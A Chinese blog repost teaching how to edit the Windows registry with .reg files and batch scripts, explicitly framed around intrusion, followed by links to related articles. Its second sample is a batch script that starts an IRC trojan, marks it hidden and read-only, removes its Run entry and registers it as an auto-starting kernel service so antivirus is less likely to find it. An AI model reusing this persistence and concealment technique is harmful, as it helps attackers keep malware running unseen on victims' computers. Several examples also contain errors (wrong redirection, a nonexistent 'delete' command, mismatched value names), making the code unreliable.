如何用批处理文件来操作注册表

于 2017-11-12 22:19:00 发布
阅读量237 收藏 1
点赞数
文章标签: 操作系统
原文链接:https://yq.aliyun.com/articles/551176
版权
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序 而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定 的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
  关于注册表的操作,常见的是创建、修改、删除。
  1.创建
  创建分为两种,一种是创建子项(Subkey)
  我们创建一个文件,内容如下:
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
  然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。
  另一种是创建一个项目名称
  那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"
Invader"="Ex4rch"
  "Door"=C:\\WINNT\\system32\\door.exe
  "Autodos"=dword:02
  这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
  新建了:Invader、door、about这三个项目
  Invader的类型是“String Value”
  door的类型是“REG SZ Value”
  Autodos的类型是“DWORD Value”
  2.修改
  修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
  3.删除
  我们首先来说说删除一个项目名称,我们创建一个如下的文件:
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  "Ex4rch"=-
  执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了;
  我们再看看删除一个子项,我们创建一个如下的脚本:
  Windows Registry Editor Version 5.00
  [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。
  相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
  samlpe1:如上面的那个例子,如想生成如下注册表文件
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  "Invader"="Ex4rch"
  "door"=hex:255
  "Autodos"=dword:000000128
  只需要这样:
  @echo Windows Registry Editor Version 5.00>>Sample.reg
  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
  @echo "Invader"="Ex4rch">>Sample.reg
  @echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
  @echo "Autodos"=dword:02>>Sample.reg
  samlpe2:
  我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启 动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例 (名为windrv32.exe)
  @start windrv32.exe
  @attrib +h +r windrv32.exe
  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
  @echo "windsnx "=- >>patch.dll
  @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
  @regedit /s patch.dll
  @delete patch.dll
  @REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
  @REM 这样不是更安全^_^.

本文转自 lvcaolhx 51CTO博客,原文链接:http://blog.51cto.com/lvcaolhx/11947
weixin_33831673
关注
批处理操作注册表教程
zzc1684的博客
06-05 1157
该文章转载自:http://wenku.baidu.com/view/ead0ab6fb84ae45c3b358cc2.html 可以在命令行中输入regedit来打开注册表,手动进行操作。也可以直接通过批处理来进行操作。下面介绍如何通过批处理来进行注册表操作。 一、reg add 描述:将新的子项或项添加到注册表中。 语法: reg add KeyName [/v EntryN...
批处理删除注册表健值的方法分享
09-15
### 用批处理删除注册表键值的方法 在日常的计算机维护工作中,有时我们需要修改或删除注册表中的某些键值来解决特定问题或是优化系统性能。注册表是Windows操作系统的核心数据库,存储着关于系统配置、应用程序...
批处理做的实用小工具(教你如何轻易修改注册表
05-10
批处理做的一个小工具,解压后右键编辑便可以看到源码而且您还可以随意修改增加更多功能。
五.如何用批处理文件操作注册表
xingpidong
12-06 500
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后 门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操 作注册表.(我们可以用批处理来生成一个REG文件) 关于注册表操作,常见的是创建、修改、删除。1.创建 创
批处理操作注册表教程(上)
mmdev
12-04 545
该文章转载自:http://wenku.baidu.com/view/ead0ab6fb84ae45c3b358cc2.html 可以在命令行中输入regedit来打开注册表,手动进行操作。也可以直接通过批处理来进行操作。下面介绍如何通过批处理来进行注册表操作。 一、reg add 描述:将新的子项或项添加到注册表中。 语法: regaddKeyName [/v EntryName...
如何用批处理修改注册表方法二则
x196231222
07-23 513
禁止使用命令提示符程序和批处理文件Windows 2000/XP下的命令提示符(即CMD.exe程序)相当于Windows 98下的MS-DOS程序。出于系统本身安全考虑,应防止非法用户在命令提示符下或是利用批处理文件(BAT文件)对计算机进行破坏,这可通过修改注册表来实现。选择【开始】→【运行】命令,在【运行】对话框的【打开】文本框中输入“regedit.exe”,单击【确定】按钮,运行注册表编辑器,依次打开以下键:HKEY_CURRENT_USER/Software/Policies/Microsoft
BAT批处理脚本-文件相关操作-如何用批处理文件操作注册表.zip
最新发布
12-26
本文将详细探讨如何使用批处理脚本来进行文件操作以及操作注册表。 **一、文件操作** 1. **创建文件**:使用`echo off > 文件名.txt`可以创建一个空的文本文件。`echo on`指令会关闭命令行的回显功能,`>`符号用于...
注册表定位bat批处理文件
01-07
总的来说,"注册表定位bat批处理文件"是一种实用的工具,它利用批处理文件的灵活性和命令行参数的强大功能,使得在注册表中导航变得更加容易,尤其适合那些频繁需要在注册表中查找和修改设置的用户。通过理解和运用...
批处理文件注册表文件修复类工具.zip
10-26
批处理文件注册表在Windows操作系统中扮演着重要的角色,它们是系统管理和维护的重要组成部分。批处理文件(Batch File)是一种简单的脚本语言,用于自动化执行一系列命令,而注册表则是存储系统设置和应用程序...
windows注册表清理 垃圾清理 批处理文件
09-14
windows注册表清理 垃圾清理 批处理文件 适合windows7 windows8 windows10 批处理文件 点击即可使用
批处理操作注册表完全攻略(读取注册表/写入注册表等)
09-15
#### 三、.Reg文件操作注册表 `.Reg`文件是一种文本格式文件,用于导入或导出注册表设置。其基本格式为: ``` Windows Registry Editor Version 5.00 [HKEY_PATH] "value_name"="value_data" ``` - **创建子项**...
批处理操作注册表教程(下)
Robin Hu的专栏
12-04 809
文章来自:http://wenku.baidu.com/view/ead0ab6fb84ae45c3b358cc2.html 五、reg export 描述:将指定子项、项和值的副本创建到文件中,以便将其传输到其它服务器。 语法: reg export KeyName FileName 参数: KeyName 指定子项的完全路径。Export 操作仅可在本地计算机上工作。以相应的子
使用批处理文件完成注册信息
u012782049的专栏
12-19 785
在编写软件时, Window系统下的动态链接库需要注册才能使用。比如在Win  XP系统下运行ADO程序,需要在当前目录下注册 regtlibv12  msado60_Backcompat_i386.tlb。 因为在软件使用时,第一次都需要进行固定的祖册信息操作。这是可以将注册信息放在一个批处理文件中,在第一次运行软件时,运行批处理文件便可以实现信息的注册。 将msado15.dll 和msa
在Dos批处理判断注册表项是否存在
五角大寨
04-23 7830
代码如下:   @echo off set regpath="HKLM/SOFTWARE/Microsoft/MSBuild/3.5"REG QUERY %regpath% /s|find "HKEY_LOCAL_MACHINE" IF ERRORLEVEL 1 (  echo %regpath% not found.) ELSE (  echo %
批处理文件操作注册表
sunkists的专栏
08-31 1794
--创建 创建分为两种,一种是创建子项(Subkey) 注:如果你对注册表的命名不是很清楚,可以看看注册表命名标准手册(http://www.sometips.com/tips/registryhack/204.htm) 我们创建一个文件,内容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE/SOFTWARE/Test4Ada
编写注册表reg文件批处理操作注册表
不若乘风来
12-04 7831
编写注册表文件新建一个文本文件,在其中输入以下内容: Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 注意:“REGEDIT4”这行与后面行之间
【语言-批处理注册表操作---比较、导入、导出、加载、卸载、查询、保存、还原、标志
少莫千华
07-15 1592
比较 REG COMPARE KeyName1 KeyName2 [/v ValueName | /ve] [Output] [/s] KeyName [\\Machine\]FullKey Machine 远程机器名 - 省略当前机器的默认值。 远程机器上只有 HKLM 和 HKU。 FullKey ROOTKEY\SubKe
批处理bat来删除注册表项,注册表键值,禁用/启用Windows服务
热门推荐
枫的专栏
09-29 1万+
删除注册表中的项 Windows Registry Editor Version 5.00 [-HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] 保存为reg文件双击导如即可删除此项 注意有个“-”号 删除注册表中的值 Windows Registry Editor Version 5.00 [HKEY_LOCA
批处理修改注册表键值
07-27
批处理可以通过修改注册表键值来实现对系统设置的更改。要批处理修改注册表键值,可以使用REG ADD命令。例如,要修改Internet Explorer的起始页,可以使用以下命令: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "https://www.baidu.com/" /f 这个命令将在注册表中的"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main"路径下创建一个名为"Start Page"的字符串值,并将其值设置为"https://www.baidu.com/"。最后的/f参数表示强制执行操作。 请注意,修改注册表键值需要管理员权限。在运行批处理文件之前,请确保以管理员身份运行它,以避免权限问题。 #### 引用[.reference_title] - *1* [批处理文件修改注册表](https://blog.csdn.net/u013010499/article/details/128901122)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值